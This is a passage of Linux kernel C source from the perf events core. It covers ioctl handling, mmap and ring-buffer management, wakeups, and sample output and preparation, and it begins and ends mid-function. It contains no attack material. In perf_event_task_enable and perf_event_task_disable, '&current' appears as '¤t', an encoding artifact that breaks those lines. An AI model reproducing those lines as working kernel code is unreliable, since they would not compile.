if (copy_to_user((void __user *)arg, &id, sizeof(id)))
return -EFAULT;
return 0;
}
case PERF_EVENT_IOC_SET_OUTPUT:
{
int ret;
if (arg != -1) {
struct perf_event *output_event;
struct fd output;
ret = perf_fget_light(arg, &output);
if (ret)
return ret;
output_event = output.file->private_data;
ret = perf_event_set_output(event, output_event);
fdput(output);
} else {
ret = perf_event_set_output(event, NULL);
}
return ret;
}
case PERF_EVENT_IOC_SET_FILTER:
return perf_event_set_filter(event, (void __user *)arg);
case PERF_EVENT_IOC_SET_BPF:
return perf_event_set_bpf_prog(event, arg);
case PERF_EVENT_IOC_PAUSE_OUTPUT: {
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb || !rb->nr_pages) {
rcu_read_unlock();
return -EINVAL;
}
rb_toggle_paused(rb, !!arg);
rcu_read_unlock();
return 0;
}
default:
return -ENOTTY;
}
if (flags & PERF_IOC_FLAG_GROUP)
perf_event_for_each(event, func);
else
perf_event_for_each_child(event, func);
return 0;
}
static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
struct perf_event *event = file->private_data;
struct perf_event_context *ctx;
long ret;
ctx = perf_event_ctx_lock(event);
ret = _perf_ioctl(event, cmd, arg);
perf_event_ctx_unlock(event, ctx);
return ret;
}
#ifdef CONFIG_COMPAT
static long perf_compat_ioctl(struct file *file, unsigned int cmd,
unsigned long arg)
{
switch (_IOC_NR(cmd)) {
case _IOC_NR(PERF_EVENT_IOC_SET_FILTER):
case _IOC_NR(PERF_EVENT_IOC_ID):
/* Fix up pointer size (usually 4 -> 8 in 32-on-64-bit case */
if (_IOC_SIZE(cmd) == sizeof(compat_uptr_t)) {
cmd &= ~IOCSIZE_MASK;
cmd |= sizeof(void *) << IOCSIZE_SHIFT;
}
break;
}
return perf_ioctl(file, cmd, arg);
}
#else
# define perf_compat_ioctl NULL
#endif
int perf_event_task_enable(void)
{
struct perf_event_context *ctx;
struct perf_event *event;
mutex_lock(¤t->perf_event_mutex);
list_for_each_entry(event, ¤t->perf_event_list, owner_entry) {
ctx = perf_event_ctx_lock(event);
perf_event_for_each_child(event, _perf_event_enable);
perf_event_ctx_unlock(event, ctx);
}
mutex_unlock(¤t->perf_event_mutex);
return 0;
}
int perf_event_task_disable(void)
{
struct perf_event_context *ctx;
struct perf_event *event;
mutex_lock(¤t->perf_event_mutex);
list_for_each_entry(event, ¤t->perf_event_list, owner_entry) {
ctx = perf_event_ctx_lock(event);
perf_event_for_each_child(event, _perf_event_disable);
perf_event_ctx_unlock(event, ctx);
}
mutex_unlock(¤t->perf_event_mutex);
return 0;
}
static int perf_event_index(struct perf_event *event)
{
if (event->hw.state & PERF_HES_STOPPED)
return 0;
if (event->state != PERF_EVENT_STATE_ACTIVE)
return 0;
return event->pmu->event_idx(event);
}
static void calc_timer_values(struct perf_event *event,
u64 *now,
u64 *enabled,
u64 *running)
{
u64 ctx_time;
*now = perf_clock();
ctx_time = event->shadow_ctx_time + *now;
*enabled = ctx_time - event->tstamp_enabled;
*running = ctx_time - event->tstamp_running;
}
static void perf_event_init_userpage(struct perf_event *event)
{
struct perf_event_mmap_page *userpg;
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
userpg = rb->user_page;
/* Allow new userspace to detect that bit 0 is deprecated */
userpg->cap_bit0_is_deprecated = 1;
userpg->size = offsetof(struct perf_event_mmap_page, __reserved);
userpg->data_offset = PAGE_SIZE;
userpg->data_size = perf_data_size(rb);
unlock:
rcu_read_unlock();
}
void __weak arch_perf_update_userpage(
struct perf_event *event, struct perf_event_mmap_page *userpg, u64 now)
{
}
/*
* Callers need to ensure there can be no nesting of this function, otherwise
* the seqlock logic goes bad. We can not serialize this because the arch
* code calls this from NMI context.
*/
void perf_event_update_userpage(struct perf_event *event)
{
struct perf_event_mmap_page *userpg;
struct ring_buffer *rb;
u64 enabled, running, now;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
/*
* compute total_time_enabled, total_time_running
* based on snapshot values taken when the event
* was last scheduled in.
*
* we cannot simply called update_context_time()
* because of locking issue as we can be called in
* NMI context
*/
calc_timer_values(event, &now, &enabled, &running);
userpg = rb->user_page;
/*
* Disable preemption so as to not let the corresponding user-space
* spin too long if we get preempted.
*/
preempt_disable();
++userpg->lock;
barrier();
userpg->index = perf_event_index(event);
userpg->offset = perf_event_count(event);
if (userpg->index)
userpg->offset -= local64_read(&event->hw.prev_count);
userpg->time_enabled = enabled +
atomic64_read(&event->child_total_time_enabled);
userpg->time_running = running +
atomic64_read(&event->child_total_time_running);
arch_perf_update_userpage(event, userpg, now);
barrier();
++userpg->lock;
preempt_enable();
unlock:
rcu_read_unlock();
}
static int perf_mmap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{
struct perf_event *event = vma->vm_file->private_data;
struct ring_buffer *rb;
int ret = VM_FAULT_SIGBUS;
if (vmf->flags & FAULT_FLAG_MKWRITE) {
if (vmf->pgoff == 0)
ret = 0;
return ret;
}
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
if (vmf->pgoff && (vmf->flags & FAULT_FLAG_WRITE))
goto unlock;
vmf->page = perf_mmap_to_page(rb, vmf->pgoff);
if (!vmf->page)
goto unlock;
get_page(vmf->page);
vmf->page->mapping = vma->vm_file->f_mapping;
vmf->page->index = vmf->pgoff;
ret = 0;
unlock:
rcu_read_unlock();
return ret;
}
static void ring_buffer_attach(struct perf_event *event,
struct ring_buffer *rb)
{
struct ring_buffer *old_rb = NULL;
unsigned long flags;
if (event->rb) {
/*
* Should be impossible, we set this when removing
* event->rb_entry and wait/clear when adding event->rb_entry.
*/
WARN_ON_ONCE(event->rcu_pending);
old_rb = event->rb;
spin_lock_irqsave(&old_rb->event_lock, flags);
list_del_rcu(&event->rb_entry);
spin_unlock_irqrestore(&old_rb->event_lock, flags);
event->rcu_batches = get_state_synchronize_rcu();
event->rcu_pending = 1;
}
if (rb) {
if (event->rcu_pending) {
cond_synchronize_rcu(event->rcu_batches);
event->rcu_pending = 0;
}
spin_lock_irqsave(&rb->event_lock, flags);
list_add_rcu(&event->rb_entry, &rb->event_list);
spin_unlock_irqrestore(&rb->event_lock, flags);
}
/*
* Avoid racing with perf_mmap_close(AUX): stop the event
* before swizzling the event::rb pointer; if it's getting
* unmapped, its aux_mmap_count will be 0 and it won't
* restart. See the comment in __perf_pmu_output_stop().
*
* Data will inevitably be lost when set_output is done in
* mid-air, but then again, whoever does it like this is
* not in for the data anyway.
*/
if (has_aux(event))
perf_event_stop(event, 0);
rcu_assign_pointer(event->rb, rb);
if (old_rb) {
ring_buffer_put(old_rb);
/*
* Since we detached before setting the new rb, so that we
* could attach the new rb, we could have missed a wakeup.
* Provide it now.
*/
wake_up_all(&event->waitq);
}
}
static void ring_buffer_wakeup(struct perf_event *event)
{
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (rb) {
list_for_each_entry_rcu(event, &rb->event_list, rb_entry)
wake_up_all(&event->waitq);
}
rcu_read_unlock();
}
struct ring_buffer *ring_buffer_get(struct perf_event *event)
{
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (rb) {
if (!atomic_inc_not_zero(&rb->refcount))
rb = NULL;
}
rcu_read_unlock();
return rb;
}
void ring_buffer_put(struct ring_buffer *rb)
{
if (!atomic_dec_and_test(&rb->refcount))
return;
WARN_ON_ONCE(!list_empty(&rb->event_list));
call_rcu(&rb->rcu_head, rb_free_rcu);
}
static void perf_mmap_open(struct vm_area_struct *vma)
{
struct perf_event *event = vma->vm_file->private_data;
atomic_inc(&event->mmap_count);
atomic_inc(&event->rb->mmap_count);
if (vma->vm_pgoff)
atomic_inc(&event->rb->aux_mmap_count);
if (event->pmu->event_mapped)
event->pmu->event_mapped(event);
}
static void perf_pmu_output_stop(struct perf_event *event);
/*
* A buffer can be mmap()ed multiple times; either directly through the same
* event, or through other events by use of perf_event_set_output().
*
* In order to undo the VM accounting done by perf_mmap() we need to destroy
* the buffer here, where we still have a VM context. This means we need
* to detach all events redirecting to us.
*/
static void perf_mmap_close(struct vm_area_struct *vma)
{
struct perf_event *event = vma->vm_file->private_data;
struct ring_buffer *rb = ring_buffer_get(event);
struct user_struct *mmap_user = rb->mmap_user;
int mmap_locked = rb->mmap_locked;
unsigned long size = perf_data_size(rb);
if (event->pmu->event_unmapped)
event->pmu->event_unmapped(event);
/*
* rb->aux_mmap_count will always drop before rb->mmap_count and
* event->mmap_count, so it is ok to use event->mmap_mutex to
* serialize with perf_mmap here.
*/
if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
/*
* Stop all AUX events that are writing to this buffer,
* so that we can free its AUX pages and corresponding PMU
* data. Note that after rb::aux_mmap_count dropped to zero,
* they won't start any more (see perf_aux_output_begin()).
*/
perf_pmu_output_stop(event);
/* now it's safe to free the pages */
atomic_long_sub(rb->aux_nr_pages, &mmap_user->locked_vm);
vma->vm_mm->pinned_vm -= rb->aux_mmap_locked;
/* this has to be the last one */
rb_free_aux(rb);
WARN_ON_ONCE(atomic_read(&rb->aux_refcount));
mutex_unlock(&event->mmap_mutex);
}
atomic_dec(&rb->mmap_count);
if (!atomic_dec_and_mutex_lock(&event->mmap_count, &event->mmap_mutex))
goto out_put;
ring_buffer_attach(event, NULL);
mutex_unlock(&event->mmap_mutex);
/* If there's still other mmap()s of this buffer, we're done. */
if (atomic_read(&rb->mmap_count))
goto out_put;
/*
* No other mmap()s, detach from all other events that might redirect
* into the now unreachable buffer. Somewhat complicated by the
* fact that rb::event_lock otherwise nests inside mmap_mutex.
*/
again:
rcu_read_lock();
list_for_each_entry_rcu(event, &rb->event_list, rb_entry) {
if (!atomic_long_inc_not_zero(&event->refcount)) {
/*
* This event is en-route to free_event() which will
* detach it and remove it from the list.
*/
continue;
}
rcu_read_unlock();
mutex_lock(&event->mmap_mutex);
/*
* Check we didn't race with perf_event_set_output() which can
* swizzle the rb from under us while we were waiting to
* acquire mmap_mutex.
*
* If we find a different rb; ignore this event, a next
* iteration will no longer find it on the list. We have to
* still restart the iteration to make sure we're not now
* iterating the wrong list.
*/
if (event->rb == rb)
ring_buffer_attach(event, NULL);
mutex_unlock(&event->mmap_mutex);
put_event(event);
/*
* Restart the iteration; either we're on the wrong list or
* destroyed its integrity by doing a deletion.
*/
goto again;
}
rcu_read_unlock();
/*
* It could be there's still a few 0-ref events on the list; they'll
* get cleaned up by free_event() -- they'll also still have their
* ref on the rb and will free it whenever they are done with it.
*
* Aside from that, this buffer is 'fully' detached and unmapped,
* undo the VM accounting.
*/
atomic_long_sub((size >> PAGE_SHIFT) + 1, &mmap_user->locked_vm);
vma->vm_mm->pinned_vm -= mmap_locked;
free_uid(mmap_user);
out_put:
ring_buffer_put(rb); /* could be last */
}
static const struct vm_operations_struct perf_mmap_vmops = {
.open = perf_mmap_open,
.close = perf_mmap_close, /* non mergable */
.fault = perf_mmap_fault,
.page_mkwrite = perf_mmap_fault,
};
static int perf_mmap(struct file *file, struct vm_area_struct *vma)
{
struct perf_event *event = file->private_data;
unsigned long user_locked, user_lock_limit;
struct user_struct *user = current_user();
unsigned long locked, lock_limit;
struct ring_buffer *rb = NULL;
unsigned long vma_size;
unsigned long nr_pages;
long user_extra = 0, extra = 0;
int ret = 0, flags = 0;
/*
* Don't allow mmap() of inherited per-task counters. This would
* create a performance issue due to all children writing to the
* same rb.
*/
if (event->cpu == -1 && event->attr.inherit)
return -EINVAL;
if (!(vma->vm_flags & VM_SHARED))
return -EINVAL;
vma_size = vma->vm_end - vma->vm_start;
if (vma->vm_pgoff == 0) {
nr_pages = (vma_size / PAGE_SIZE) - 1;
} else {
/*
* AUX area mapping: if rb->aux_nr_pages != 0, it's already
* mapped, all subsequent mappings should have the same size
* and offset. Must be above the normal perf buffer.
*/
u64 aux_offset, aux_size;
if (!event->rb)
return -EINVAL;
nr_pages = vma_size / PAGE_SIZE;
mutex_lock(&event->mmap_mutex);
ret = -EINVAL;
rb = event->rb;
if (!rb)
goto aux_unlock;
aux_offset = ACCESS_ONCE(rb->user_page->aux_offset);
aux_size = ACCESS_ONCE(rb->user_page->aux_size);
if (aux_offset < perf_data_size(rb) + PAGE_SIZE)
goto aux_unlock;
if (aux_offset != vma->vm_pgoff << PAGE_SHIFT)
goto aux_unlock;
/* already mapped with a different offset */
if (rb_has_aux(rb) && rb->aux_pgoff != vma->vm_pgoff)
goto aux_unlock;
if (aux_size != vma_size || aux_size != nr_pages * PAGE_SIZE)
goto aux_unlock;
/* already mapped with a different size */
if (rb_has_aux(rb) && rb->aux_nr_pages != nr_pages)
goto aux_unlock;
if (!is_power_of_2(nr_pages))
goto aux_unlock;
if (!atomic_inc_not_zero(&rb->mmap_count))
goto aux_unlock;
if (rb_has_aux(rb)) {
atomic_inc(&rb->aux_mmap_count);
ret = 0;
goto unlock;
}
atomic_set(&rb->aux_mmap_count, 1);
user_extra = nr_pages;
goto accounting;
}
/*
* If we have rb pages ensure they're a power-of-two number, so we
* can do bitmasks instead of modulo.
*/
if (nr_pages != 0 && !is_power_of_2(nr_pages))
return -EINVAL;
if (vma_size != PAGE_SIZE * (1 + nr_pages))
return -EINVAL;
WARN_ON_ONCE(event->ctx->parent_ctx);
again:
mutex_lock(&event->mmap_mutex);
if (event->rb) {
if (event->rb->nr_pages != nr_pages) {
ret = -EINVAL;
goto unlock;
}
if (!atomic_inc_not_zero(&event->rb->mmap_count)) {
/*
* Raced against perf_mmap_close() through
* perf_event_set_output(). Try again, hope for better
* luck.
*/
mutex_unlock(&event->mmap_mutex);
goto again;
}
goto unlock;
}
user_extra = nr_pages + 1;
accounting:
user_lock_limit = sysctl_perf_event_mlock >> (PAGE_SHIFT - 10);
/*
* Increase the limit linearly with more CPUs:
*/
user_lock_limit *= num_online_cpus();
user_locked = atomic_long_read(&user->locked_vm) + user_extra;
if (user_locked > user_lock_limit)
extra = user_locked - user_lock_limit;
lock_limit = rlimit(RLIMIT_MEMLOCK);
lock_limit >>= PAGE_SHIFT;
locked = vma->vm_mm->pinned_vm + extra;
if ((locked > lock_limit) && perf_paranoid_tracepoint_raw() &&
!capable(CAP_IPC_LOCK)) {
ret = -EPERM;
goto unlock;
}
WARN_ON(!rb && event->rb);
if (vma->vm_flags & VM_WRITE)
flags |= RING_BUFFER_WRITABLE;
if (!rb) {
rb = rb_alloc(nr_pages,
event->attr.watermark ? event->attr.wakeup_watermark : 0,
event->cpu, flags);
if (!rb) {
ret = -ENOMEM;
goto unlock;
}
atomic_set(&rb->mmap_count, 1);
rb->mmap_user = get_current_user();
rb->mmap_locked = extra;
ring_buffer_attach(event, rb);
perf_event_init_userpage(event);
perf_event_update_userpage(event);
} else {
ret = rb_alloc_aux(rb, event, vma->vm_pgoff, nr_pages,
event->attr.aux_watermark, flags);
if (!ret)
rb->aux_mmap_locked = extra;
}
unlock:
if (!ret) {
atomic_long_add(user_extra, &user->locked_vm);
vma->vm_mm->pinned_vm += extra;
atomic_inc(&event->mmap_count);
} else if (rb) {
atomic_dec(&rb->mmap_count);
}
aux_unlock:
mutex_unlock(&event->mmap_mutex);
/*
* Since pinned accounting is per vm we cannot allow fork() to copy our
* vma.
*/
vma->vm_flags |= VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP;
vma->vm_ops = &perf_mmap_vmops;
if (event->pmu->event_mapped)
event->pmu->event_mapped(event);
return ret;
}
static int perf_fasync(int fd, struct file *filp, int on)
{
struct inode *inode = file_inode(filp);
struct perf_event *event = filp->private_data;
int retval;
inode_lock(inode);
retval = fasync_helper(fd, filp, on, &event->fasync);
inode_unlock(inode);
if (retval < 0)
return retval;
return 0;
}
static const struct file_operations perf_fops = {
.llseek = no_llseek,
.release = perf_release,
.read = perf_read,
.poll = perf_poll,
.unlocked_ioctl = perf_ioctl,
.compat_ioctl = perf_compat_ioctl,
.mmap = perf_mmap,
.fasync = perf_fasync,
};
/*
* Perf event wakeup
*
* If there's data, ensure we set the poll() state and publish everything
* to user-space before waking everybody up.
*/
static inline struct fasync_struct **perf_event_fasync(struct perf_event *event)
{
/* only the parent has fasync state */
if (event->parent)
event = event->parent;
return &event->fasync;
}
void perf_event_wakeup(struct perf_event *event)
{
ring_buffer_wakeup(event);
if (event->pending_kill) {
kill_fasync(perf_event_fasync(event), SIGIO, event->pending_kill);
event->pending_kill = 0;
}
}
static void perf_pending_event(struct irq_work *entry)
{
struct perf_event *event = container_of(entry,
struct perf_event, pending);
int rctx;
rctx = perf_swevent_get_recursion_context();
/*
* If we 'fail' here, that's OK, it means recursion is already disabled
* and we won't recurse 'further'.
*/
if (event->pending_disable) {
event->pending_disable = 0;
perf_event_disable_local(event);
}
if (event->pending_wakeup) {
event->pending_wakeup = 0;
perf_event_wakeup(event);
}
if (rctx >= 0)
perf_swevent_put_recursion_context(rctx);
}
/*
* We assume there is only KVM supporting the callbacks.
* Later on, we might change it to a list if there is
* another virtualization implementation supporting the callbacks.
*/
struct perf_guest_info_callbacks *perf_guest_cbs;
int perf_register_guest_info_callbacks(struct perf_guest_info_callbacks *cbs)
{
perf_guest_cbs = cbs;
return 0;
}
EXPORT_SYMBOL_GPL(perf_register_guest_info_callbacks);
int perf_unregister_guest_info_callbacks(struct perf_guest_info_callbacks *cbs)
{
perf_guest_cbs = NULL;
return 0;
}
EXPORT_SYMBOL_GPL(perf_unregister_guest_info_callbacks);
static void
perf_output_sample_regs(struct perf_output_handle *handle,
struct pt_regs *regs, u64 mask)
{
int bit;
DECLARE_BITMAP(_mask, 64);
bitmap_from_u64(_mask, mask);
for_each_set_bit(bit, _mask, sizeof(mask) * BITS_PER_BYTE) {
u64 val;
val = perf_reg_value(regs, bit);
perf_output_put(handle, val);
}
}
static void perf_sample_regs_user(struct perf_regs *regs_user,
struct pt_regs *regs,
struct pt_regs *regs_user_copy)
{
if (user_mode(regs)) {
regs_user->abi = perf_reg_abi(current);
regs_user->regs = regs;
} else if (current->mm) {
perf_get_regs_user(regs_user, regs, regs_user_copy);
} else {
regs_user->abi = PERF_SAMPLE_REGS_ABI_NONE;
regs_user->regs = NULL;
}
}
static void perf_sample_regs_intr(struct perf_regs *regs_intr,
struct pt_regs *regs)
{
regs_intr->regs = regs;
regs_intr->abi = perf_reg_abi(current);
}
/*
* Get remaining task size from user stack pointer.
*
* It'd be better to take stack vma map and limit this more
* precisly, but there's no way to get it safely under interrupt,
* so using TASK_SIZE as limit.
*/
static u64 perf_ustack_task_size(struct pt_regs *regs)
{
unsigned long addr = perf_user_stack_pointer(regs);
if (!addr || addr >= TASK_SIZE)
return 0;
return TASK_SIZE - addr;
}
static u16
perf_sample_ustack_size(u16 stack_size, u16 header_size,
struct pt_regs *regs)
{
u64 task_size;
/* No regs, no stack pointer, no dump. */
if (!regs)
return 0;
/*
* Check if we fit in with the requested stack size into the:
* - TASK_SIZE
* If we don't, we limit the size to the TASK_SIZE.
*
* - remaining sample size
* If we don't, we customize the stack size to
* fit in to the remaining sample size.
*/
task_size = min((u64) USHRT_MAX, perf_ustack_task_size(regs));
stack_size = min(stack_size, (u16) task_size);
/* Current header size plus static size and dynamic size. */
header_size += 2 * sizeof(u64);
/* Do we fit in with the current stack dump size? */
if ((u16) (header_size + stack_size) < header_size) {
/*
* If we overflow the maximum size for the sample,
* we customize the stack dump size to fit in.
*/
stack_size = USHRT_MAX - header_size - sizeof(u64);
stack_size = round_up(stack_size, sizeof(u64));
}
return stack_size;
}
static void
perf_output_sample_ustack(struct perf_output_handle *handle, u64 dump_size,
struct pt_regs *regs)
{
/* Case of a kernel thread, nothing to dump */
if (!regs) {
u64 size = 0;
perf_output_put(handle, size);
} else {
unsigned long sp;
unsigned int rem;
u64 dyn_size;
/*
* We dump:
* static size
* - the size requested by user or the best one we can fit
* in to the sample max size
* data
* - user stack dump data
* dynamic size
* - the actual dumped size
*/
/* Static size. */
perf_output_put(handle, dump_size);
/* Data. */
sp = perf_user_stack_pointer(regs);
rem = __output_copy_user(handle, (void *) sp, dump_size);
dyn_size = dump_size - rem;
perf_output_skip(handle, rem);
/* Dynamic size. */
perf_output_put(handle, dyn_size);
}
}
static void __perf_event_header__init_id(struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event)
{
u64 sample_type = event->attr.sample_type;
data->type = sample_type;
header->size += event->id_header_size;
if (sample_type & PERF_SAMPLE_TID) {
/* namespace issues */
data->tid_entry.pid = perf_event_pid(event, current);
data->tid_entry.tid = perf_event_tid(event, current);
}
if (sample_type & PERF_SAMPLE_TIME)
data->time = perf_event_clock(event);
if (sample_type & (PERF_SAMPLE_ID | PERF_SAMPLE_IDENTIFIER))
data->id = primary_event_id(event);
if (sample_type & PERF_SAMPLE_STREAM_ID)
data->stream_id = event->id;
if (sample_type & PERF_SAMPLE_CPU) {
data->cpu_entry.cpu = raw_smp_processor_id();
data->cpu_entry.reserved = 0;
}
}
void perf_event_header__init_id(struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event)
{
if (event->attr.sample_id_all)
__perf_event_header__init_id(header, data, event);
}
static void __perf_event__output_id_sample(struct perf_output_handle *handle,
struct perf_sample_data *data)
{
u64 sample_type = data->type;
if (sample_type & PERF_SAMPLE_TID)
perf_output_put(handle, data->tid_entry);
if (sample_type & PERF_SAMPLE_TIME)
perf_output_put(handle, data->time);
if (sample_type & PERF_SAMPLE_ID)
perf_output_put(handle, data->id);
if (sample_type & PERF_SAMPLE_STREAM_ID)
perf_output_put(handle, data->stream_id);
if (sample_type & PERF_SAMPLE_CPU)
perf_output_put(handle, data->cpu_entry);
if (sample_type & PERF_SAMPLE_IDENTIFIER)
perf_output_put(handle, data->id);
}
void perf_event__output_id_sample(struct perf_event *event,
struct perf_output_handle *handle,
struct perf_sample_data *sample)
{
if (event->attr.sample_id_all)
__perf_event__output_id_sample(handle, sample);
}
static void perf_output_read_one(struct perf_output_handle *handle,
struct perf_event *event,
u64 enabled, u64 running)
{
u64 read_format = event->attr.read_format;
u64 values[4];
int n = 0;
values[n++] = perf_event_count(event);
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED) {
values[n++] = enabled +
atomic64_read(&event->child_total_time_enabled);
}
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING) {
values[n++] = running +
atomic64_read(&event->child_total_time_running);
}
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(event);
__output_copy(handle, values, n * sizeof(u64));
}
/*
* XXX PERF_FORMAT_GROUP vs inherited events seems difficult.
*/
static void perf_output_read_group(struct perf_output_handle *handle,
struct perf_event *event,
u64 enabled, u64 running)
{
struct perf_event *leader = event->group_leader, *sub;
u64 read_format = event->attr.read_format;
u64 values[5];
int n = 0;
values[n++] = 1 + leader->nr_siblings;
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
values[n++] = enabled;
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
values[n++] = running;
if (leader != event)
leader->pmu->read(leader);
values[n++] = perf_event_count(leader);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(leader);
__output_copy(handle, values, n * sizeof(u64));
list_for_each_entry(sub, &leader->sibling_list, group_entry) {
n = 0;
if ((sub != event) &&
(sub->state == PERF_EVENT_STATE_ACTIVE))
sub->pmu->read(sub);
values[n++] = perf_event_count(sub);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(sub);
__output_copy(handle, values, n * sizeof(u64));
}
}
#define PERF_FORMAT_TOTAL_TIMES (PERF_FORMAT_TOTAL_TIME_ENABLED|\
PERF_FORMAT_TOTAL_TIME_RUNNING)
static void perf_output_read(struct perf_output_handle *handle,
struct perf_event *event)
{
u64 enabled = 0, running = 0, now;
u64 read_format = event->attr.read_format;
/*
* compute total_time_enabled, total_time_running
* based on snapshot values taken when the event
* was last scheduled in.
*
* we cannot simply called update_context_time()
* because of locking issue as we are called in
* NMI context
*/
if (read_format & PERF_FORMAT_TOTAL_TIMES)
calc_timer_values(event, &now, &enabled, &running);
if (event->attr.read_format & PERF_FORMAT_GROUP)
perf_output_read_group(handle, event, enabled, running);
else
perf_output_read_one(handle, event, enabled, running);
}
void perf_output_sample(struct perf_output_handle *handle,
struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event)
{
u64 sample_type = data->type;
perf_output_put(handle, *header);
if (sample_type & PERF_SAMPLE_IDENTIFIER)
perf_output_put(handle, data->id);
if (sample_type & PERF_SAMPLE_IP)
perf_output_put(handle, data->ip);
if (sample_type & PERF_SAMPLE_TID)
perf_output_put(handle, data->tid_entry);
if (sample_type & PERF_SAMPLE_TIME)
perf_output_put(handle, data->time);
if (sample_type & PERF_SAMPLE_ADDR)
perf_output_put(handle, data->addr);
if (sample_type & PERF_SAMPLE_ID)
perf_output_put(handle, data->id);
if (sample_type & PERF_SAMPLE_STREAM_ID)
perf_output_put(handle, data->stream_id);
if (sample_type & PERF_SAMPLE_CPU)
perf_output_put(handle, data->cpu_entry);
if (sample_type & PERF_SAMPLE_PERIOD)
perf_output_put(handle, data->period);
if (sample_type & PERF_SAMPLE_READ)
perf_output_read(handle, event);
if (sample_type & PERF_SAMPLE_CALLCHAIN) {
if (data->callchain) {
int size = 1;
if (data->callchain)
size += data->callchain->nr;
size *= sizeof(u64);
__output_copy(handle, data->callchain, size);
} else {
u64 nr = 0;
perf_output_put(handle, nr);
}
}
if (sample_type & PERF_SAMPLE_RAW) {
struct perf_raw_record *raw = data->raw;
if (raw) {
struct perf_raw_frag *frag = &raw->frag;
perf_output_put(handle, raw->size);
do {
if (frag->copy) {
__output_custom(handle, frag->copy,
frag->data, frag->size);
} else {
__output_copy(handle, frag->data,
frag->size);
}
if (perf_raw_frag_last(frag))
break;
frag = frag->next;
} while (1);
if (frag->pad)
__output_skip(handle, NULL, frag->pad);
} else {
struct {
u32 size;
u32 data;
} raw = {
.size = sizeof(u32),
.data = 0,
};
perf_output_put(handle, raw);
}
}
if (sample_type & PERF_SAMPLE_BRANCH_STACK) {
if (data->br_stack) {
size_t size;
size = data->br_stack->nr
* sizeof(struct perf_branch_entry);
perf_output_put(handle, data->br_stack->nr);
perf_output_copy(handle, data->br_stack->entries, size);
} else {
/*
* we always store at least the value of nr
*/
u64 nr = 0;
perf_output_put(handle, nr);
}
}
if (sample_type & PERF_SAMPLE_REGS_USER) {
u64 abi = data->regs_user.abi;
/*
* If there are no regs to dump, notice it through
* first u64 being zero (PERF_SAMPLE_REGS_ABI_NONE).
*/
perf_output_put(handle, abi);
if (abi) {
u64 mask = event->attr.sample_regs_user;
perf_output_sample_regs(handle,
data->regs_user.regs,
mask);
}
}
if (sample_type & PERF_SAMPLE_STACK_USER) {
perf_output_sample_ustack(handle,
data->stack_user_size,
data->regs_user.regs);
}
if (sample_type & PERF_SAMPLE_WEIGHT)
perf_output_put(handle, data->weight);
if (sample_type & PERF_SAMPLE_DATA_SRC)
perf_output_put(handle, data->data_src.val);
if (sample_type & PERF_SAMPLE_TRANSACTION)
perf_output_put(handle, data->txn);
if (sample_type & PERF_SAMPLE_REGS_INTR) {
u64 abi = data->regs_intr.abi;
/*
* If there are no regs to dump, notice it through
* first u64 being zero (PERF_SAMPLE_REGS_ABI_NONE).
*/
perf_output_put(handle, abi);
if (abi) {
u64 mask = event->attr.sample_regs_intr;
perf_output_sample_regs(handle,
data->regs_intr.regs,
mask);
}
}
if (!event->attr.watermark) {
int wakeup_events = event->attr.wakeup_events;
if (wakeup_events) {
struct ring_buffer *rb = handle->rb;
int events = local_inc_return(&rb->events);
if (events >= wakeup_events) {
local_sub(wakeup_events, &rb->events);
local_inc(&rb->wakeup);
}
}
}
}
void perf_prepare_sample(struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event,
struct pt_regs *regs)
{
u64 sample_type = event->attr.sample_type;
header->type = PERF_RECORD_SAMPLE;
header->size = sizeof(*header) + event->header_size;
header->misc = 0;
header->misc |= perf_misc_flags(regs);
__perf_event_header__init_id(header, data, event);
if (sample_type & PERF_SAMPLE_IP)
data->ip = perf_instruction_pointer(regs);
if (sample_type & PERF_SAMPLE_CALLCHAIN) {
int size = 1;
data->callchain = perf_callchain(event, regs);
if (data->callchain)
size += data->callchain->nr;
header->size += size * sizeof(u64);
}
if (sample_type & PERF_SAMPLE_RAW) {
struct perf_raw_record *raw = data->raw;
int size;
if (raw) {
struct perf_raw_frag *frag = &raw->frag;
u32 sum = 0;
do {
sum += frag->size;
if (perf_raw_frag_last(frag))
break;
frag = frag->next;
} while (1);
size = round_up(sum + sizeof(u32), sizeof(u64));
raw->size = size - sizeof(u32);
frag->pad = raw->size - sum;
} else {
size = sizeof(u64);
}
header->size += size;
}
if (sample_type & PERF_SAMPLE_BRANCH_STACK) {
int size = sizeof(u64); /* nr */
if (data->br_stack) {
size += data->br_stack->nr
* sizeof(struct perf_branch_entry);
}
header->size += size;
}
if (sample_type & (PERF_SAMPLE_REGS_USER | PERF_SAMPLE_STACK_USER))
perf_sample_regs_user(&data->regs_user, regs,
&data->regs_user_copy);
if (sample_type & PERF_SAMPLE_REGS_USER) {
/* regs dump ABI info */
int size = sizeof(u64);
if (data->regs_user.regs) {
u64 mask = event->attr.sample_regs_user;
size += hweight64(mask) * sizeof(u64);
}
header->size += size;
}
if (sample_type & PERF_SAMPLE_STACK_USER) {
/*
* Either we need PERF_SAMPLE_STACK_USER bit to be allways
* processed as the last one or have additional check added
* in case new sample type is added, because we could eat
* up the rest of the sample size.
*/
u16 stack_size = event->attr.sample_stack_user;
u16 size = sizeof(u64);
stack_size = perf_sample_ustack_size(stack_size, header->size,
